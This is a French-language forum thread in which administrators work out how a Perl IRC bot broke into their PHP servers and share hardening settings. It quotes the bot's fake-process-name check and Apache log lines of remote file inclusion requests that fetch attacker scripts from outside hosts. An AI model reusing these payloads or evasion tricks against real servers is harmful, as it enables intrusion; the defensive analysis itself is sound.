Il semblerait que : [ha.ckers.org]
soit plus aboutie car elle cache son cette commande :

my $processo = '[V8-Final]';                   # Fake process name for the bot                #
if (`ps uxw` =~ /v8-Final/)                    # (CHANGE IT!!!)                               #
{                                              #                                              #
exit;                                          #                                              #
}

Ensuite pour rentrer sur le serveur, elle utilise le faite que l'on ait soit dans php*.ini ou dans un .htaccess un safe_mode = Off et disable_functions = (vide) (ce qui était le cas chez moi)...#%b

PS : D'ailleur pourquoi ce )#%b:,(:-o de fichier php.ini n'a pas la directive disable_functions =exec,highlight_file,passthru,popen,proc_open,shell_exec,show_source,system par défaut ?
(c'est juste un coup de gueule, mais c'est ma faute !)


Software is like sex !
It's better when it's Free !

Poste le Tuesday 5 December 2006 04:04:06

Je veux juste tester^^D-*;-pX-o

Poste le Saturday 16 December 2006 15:23:49

C'est autre chose, mais j'ai eu

150.140.140.91 - - [16/Dec/2006:23:22:57 +0100] "GET /index.php?page=http://www.safariscout.co.uk/de/img/motives/cc.txt? HTTP/1.1" 200 1823 "-" "libwww-perl/5.803"
150.140.140.91 - - [16/Dec/2006:23:22:57 +0100] "GET /index.php?page=http://www.safariscout.co.uk/de/img/motives/cc.txt? HTTP/1.1" 200 1823 "-" "libwww-perl/5.803"
150.140.140.91 - - [16/Dec/2006:23:26:08 +0100] "GET /index.php?page=http://www.safariscout.co.uk/de/img/motives/cc.txt? HTTP/1.1" 200 1823 "-" "libwww-perl/5.803"
150.140.140.91 - - [16/Dec/2006:23:26:08 +0100] "GET /index.php?page=http://www.safariscout.co.uk/de/img/motives/cc.txt? HTTP/1.1" 200 1823 "-" "libwww-perl/5.803"

Es les symptômes étaient semblables pour toi ?

$ uptime
19:28:06 up 12 days, 20:46,  2 users,  load average: 213.96, 212.37, 208.44

Poste le Sunday 17 December 2006 11:21:37

Oui et non !

Oui : une requète une URL qui ne mène à rien....
Non : Parce que le GET portait sur : "GET [...."];

Ex :
218.76.228.79 - - [15/Oct/2005:12:02:43 +0000] "GET [www.exxxitmoney.com] HTTP/1.0" 403 480
218.76.228.79 - - [15/Oct/2005:12:02:44 +0000] "GET [www.exxxitmoney.com] HTTP/1.0" 403 480
211.143.15.4 - - [15/Oct/2005:12:02:52 +0000] "GET [www.mine-seek.com] HTTP/1.1" 403 449


Software is like sex !
It's better when it's Free !

Poste le Sunday 17 December 2006 12:59:14

Je connais le problème avec include dans php, mais là je comprend pas quel type de faille ils tentes d'exploiter.

$ uptime
19:28:06 up 12 days, 20:46,  2 users,  load average: 213.96, 212.37, 208.44

Poste le Sunday 17 December 2006 17:19:41

Comme entre le début des message et aujourd'hui j'ai avancé...
La faille en est une sans en être une.

Elle vient de php.ini :

safe_mode = Off
disable_functions =
register_globals = On

Les scripts php ayant les droits de l'utilisateur (apache) et (apache) ayant alors le droit de lancer :
exec,highlight_file,passthru,popen,proc_open,shell_exec,show_source,system

J'ai donc dans php.ini

safe_mode = On
disable_functions = exec,highlight_file,passthru,popen,proc_open,shell_exec,show_source,system
register_globals = On 
#(parce que j'en ai besoin)

Il ont alors la possibilité de lancer un processus apache nouveau et les option qu'ils veulent...
"httpd -DSL"

C'est ce que j'avais compris pour le peu d'espagnol/portugais (on vois mon niveau dans l'un ou l'autre) que je comprends...
plus d'info : [www.google.fr]

Software is like sex !
It's better when it's Free !

Poste le Sunday 17 December 2006 19:29:40

Allez, j'en rajoute une couche...

Mon site est sur /path-de-mon-site
Mes cgi sont sur /var/www/cgi-bin

Donc mon fstab

/dev/hdc6 /path-de-mon-site ext3 nodev,noexec,defaults 1 2

Pas d'éxecution sur le path-de-mon-site...

Bon en même temps si qlq un voit une grosse bétise dans ce que j'ai dis qu'il le dise...
J'apprend toujours !


Software is like sex !
It's better when it's Free !

Poste le Sunday 17 December 2006 19:35:20

Bonjour,

J'ai d'autre infos.
Il semblerait que vulnscan permet d'envoyer des mails à votre insu.
J'ai un serveur mail (postfix) couplé avec clamav. Il jette les mails contenant des virus !
Et je reçois des alertes mail de mon clamav :

A virus was found: HTML.Phishing.Bank-164
The mail originated from: <?@server42.easycgidomains.com>
According to the 'Received:' trace, the message originated at:
  [66.199.249.114]
  nobody

Notification to sender will not be mailed.

The message WAS NOT delivered to:
<tatata@domain.net>:

Il me met aussi l'entête :

Return-Path: <nobody@server42.easycgidomains.com>
Received: from moutng.kundenserver.de (moutng.kundenserver.de [212.227.126.188])
        by smtp.system-linux.net (Postfix) with ESMTP id 65D511B8DBF
        for <tatata@domain.net>; Sun,  4 Feb 2007 05:58:39 +0100 (CET)
Received-SPF: none (mxeu1: 212.27.35.141 is neither permitted nor denied by domain of server42.easycgidomains.com) client-ip=212.27.35.141; envelope-from=nobody@server42.easycgidomains.com; helo=smtpout1.online.net;
Received: from [212.27.35.141] (helo=smtpout1.online.net)
        by mx.kundenserver.de (node=mxeu1) with ESMTP (Nemesis),
        id 0MKpV6-1HDZMy1wTs-0004L0 for lbdo@lyonbd.org; Sun, 04 Feb 2007 05:52:55 +0100
Received: from mx2.online.net (mx2.online.net [212.27.35.132])
        by smtpout1.online.net (Postfix) with SMTP id 29FF2949064
        for <lbdo@lyonbd.org>; Sun,  4 Feb 2007 05:52:52 +0100 (CET)
Received: (qmail 24639 invoked by uid 621128); 4 Feb 2007 04:52:52 -0000
Delivered-To: lyonbd.com-lbdo@lyonbd.com
Received: (qmail 24635 invoked by alias); 4 Feb 2007 04:52:52 -0000
Delivered-To: lyonbd.com-webmaster@lyonbd.com
Received: (qmail 24632 invoked from network); 4 Feb 2007 04:52:52 -0000
Received: from 66.199.249.114 (HELO server42.easycgidomains.com) (66.199.249.114)
  by mx2.online.net with SMTP; 4 Feb 2007 04:52:52 -0000
Received: from nobody by server42.easycgidomains.com with local (Exim 4.63)
        (envelope-from <nobody@server42.easycgidomains.com>)
        id 1HDZMl-0005Yi-NL
        for webmaster@lyonbd.com; Sat, 03 Feb 2007 23:52:40 -0500
To: webmaster@lyonbd.com
Subject: Security Measures
From: Paypal <administracion@paypal.com>
Reply-To: 
MIME-Version: 1.0
Message-Id:<1130384585.13653@paypal.com>
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Date: Sat, 03 Feb 2007 23:52:39 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server42.easycgidomains.com
X-AntiAbuse: Original Domain - lyonbd.com
X-AntiAbuse: Originator/Caller UID/GID - [99 32002] / [47 12]
X-AntiAbuse: Sender Address Domain - server42.easycgidomains.com
X-Source: 
X-Source-Args: /usr/local/apache/bin/httpd -DSSL 
X-Source-Dir: masterwebportal.com:/public_html/data
X-ProXaD-VC: Virus Found
-------------------------- END HEADERS ------------------------------

Donc le mail que j'ai reçu est envoyer par une machine hackée.

Et des infos : [guides.ovh.com]

Software is like sex !
It's better when it's Free !

Poste le Sunday 4 February 2007 14:11:53